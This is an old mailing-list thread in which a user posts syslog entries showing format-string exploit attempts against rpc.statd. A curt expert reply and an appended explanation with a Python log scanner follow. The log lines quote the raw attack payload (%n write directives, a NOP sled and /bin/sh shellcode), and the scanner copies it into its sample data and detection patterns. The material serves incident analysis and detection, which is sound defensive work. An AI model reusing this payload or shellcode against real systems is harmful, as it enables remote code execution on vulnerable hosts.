Yes, they are likely break-in attempts. Why in the *world* are you running
rpc.statd (or portmap, or...never mind...some people can't be helped) on a
publicly accessible machine? That's flat out stupid.
Ken Seefried, CISSP
Christian Jaeger writes:
> Hello,
>
> I run a pc with potato on a cable modem line. Recently I discovered the
> following in /var/log/messages:
>
> Jun 10 20:21:16 pflanze -- MARK --
> Jun 10 20:33:55 pflanze
> Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
> %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\
> Jun 10 20:33:55 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 10 21:01:16 pflanze -- MARK --
>
> Jun 11 13:41:16 pflanze -- MARK --
> Jun 11 13:47:10 pflanze
> Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
> %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\
> Jun 11 13:47:10 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 11 14:01:16 pflanze -- MARK --
>
> Jun 12 09:01:16 pflanze -- MARK --
> Jun 12 09:09:47 pflanze
> Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
> 220\220\220\220\220\220\220\220\220\220\220\220\220
> Jun 12 09:09:47 pflanze
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> Jun 12 09:21:16 pflanze -- MARK --
>
> Seems like a buffer overflow. (Is it happening in rpc.statd or in named or
> somewhere else?)
>
> I've now removed nfs-common && nfs-server. (BTW there's still a daemon
> (portmap, from netbase) running on the sunrpc port - I thought sunrpc is
> only (mainly?) for NFS?)
>
> After that I've installed ippl, which gives some interesting output as
> well:
>
> Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com
> [172.189.201.98]
> Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
> [66.66.4.173]
> Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
> [66.66.4.173]
>
> Jun 17 11:04:36 webcache connection attempt from
> ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45]
>
> Jun 17 18:14:47 sunrpc connection attempt from
> h24-79-83-253.vc.shawcable.net [24.79.83.253]
> Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz
> [62.168.55.246]
>
> Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
> Jun 18 00:07:26 port 445 connection attempt from [62.2.179.7]
> Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7]
>
> Now when I think about it these will probably all be harmless (maybe
> others on this cable modem subnet were serving stuff when they had my IP).
> If yes, please excuse my anxiety.
>
> .christian.
>
>
> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
>
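What the quoted /var/log/messages lines show is a format-string attack payload rather than a plain buffer overflow: the `%8x...%236x%n` run walks the stack and makes the logging call's printf-style formatter write a counter to memory through `%n`, the `\220` bytes are octal for 0x90 (the x86 NOP), `÷ÿ¿` are the high bytes of a 0xbfff.... stack address, and the second line of each pair (`/bin`, `/sh`, `Í\200` = `cd 80`, `int 0x80`) is the shellcode itself. As an added example that is not part of the list thread or of any nfs-utils code, the following Python scores syslog lines for those markers so a MARK line or a stray `100%x` in a normal message is not flagged. The sample lines are constructed from the quoted ones with the NOP sleds shortened, and the `Í\200` signature assumes the log was written the way this page shows it (0xCD kept as the printable Latin-1 `Í`, 0x80 escaped as octal `\200`).

```python
"""Flag format-string exploit attempts in syslog-style log lines.

Added example for the thread above; not code from the list or from
nfs-utils.  It works on the text as syslogd wrote it: non-printable
bytes appear as octal escapes such as \\220 (0x90, the x86 NOP),
while high bytes that are printable in ISO-8859-1 appear as-is
(0xCD, the first byte of `int 0x80`, shows up as `Í`).
"""
import re
from dataclasses import dataclass

# Constructed sample, modelled on the lines quoted in the thread.
# The NOP sleds are shortened; the real ones were much longer.
SAMPLE_LOG = r"""Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220
Jun 10 20:33:55 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220
Jun 12 10:00:00 pflanze /sbin/rpc.statd[229]: gethostbyname error for nfsclient.example.invalid
Jun 12 10:05:00 pflanze sshd[400]: log message with a stray 100%x percent
"""

# %n / %hn / %hhn / %ln write the number of bytes printed so far to a
# pointer taken from the stack; no legitimate hostname contains them.
WRITE_DIRECTIVE = re.compile(r"%\d*(?:hh|h|l|ll)?n")
# %8x, %236x ...: padding directives used to walk up the stack and to
# set the byte counter that %n will write.
PAD_DIRECTIVE = re.compile(r"%\d+[xdu]")
# A run of octal-escaped 0x90 bytes, as syslogd renders a NOP sled.
NOP_SLED = re.compile(r"(?:\\220){8,}")
# 0xCD 0x80 (int 0x80) as it appeared in the quoted log (assumption:
# 0xCD printed as Latin-1 'Í', 0x80 escaped as \200), plus the two
# halves of "/bin/sh" that the shellcode stores with two mov dwords.
SYSCALL = re.compile(r"Í\\200")
SHELL_STR = re.compile(r"/bin.{0,8}/sh")


@dataclass
class Verdict:
    line: str
    writes: int      # number of %n-style write directives
    pads: int        # number of %Nx-style padding directives
    nop_sled: bool
    shellcode: bool

    @property
    def suspicious(self) -> bool:
        # One %n plus stack-walking padding is already an exploit attempt;
        # a NOP sled or shellcode fragment on its own also counts.
        return (self.writes >= 1 and self.pads >= 4) or self.nop_sled or self.shellcode


def analyse_line(line: str) -> Verdict:
    """Score a single log line for format-string exploit markers."""
    return Verdict(
        line=line,
        writes=len(WRITE_DIRECTIVE.findall(line)),
        pads=len(PAD_DIRECTIVE.findall(line)),
        nop_sled=NOP_SLED.search(line) is not None,
        shellcode=SYSCALL.search(line) is not None or SHELL_STR.search(line) is not None,
    )


def scan(text: str) -> list[Verdict]:
    """Return the verdicts for every non-empty line that looks like an attack."""
    return [v for v in map(analyse_line, text.splitlines()) if v.line.strip() and v.suspicious]


if __name__ == "__main__":
    for v in scan(SAMPLE_LOG):
        print(f"%n={v.writes} pad={v.pads} sled={v.nop_sled} sc={v.shellcode}: {v.line[:70]}")
```

Run against the sample it reports the three payload lines (the two `gethostbyname error` lines and the shellcode line) and stays quiet on the MARK line, the benign lookup failure and the message containing a lone `%x`; feeding it the real file (`scan(open('/var/log/messages', encoding='latin-1').read())`) works the same way, since the patterns only depend on how syslogd escapes the bytes.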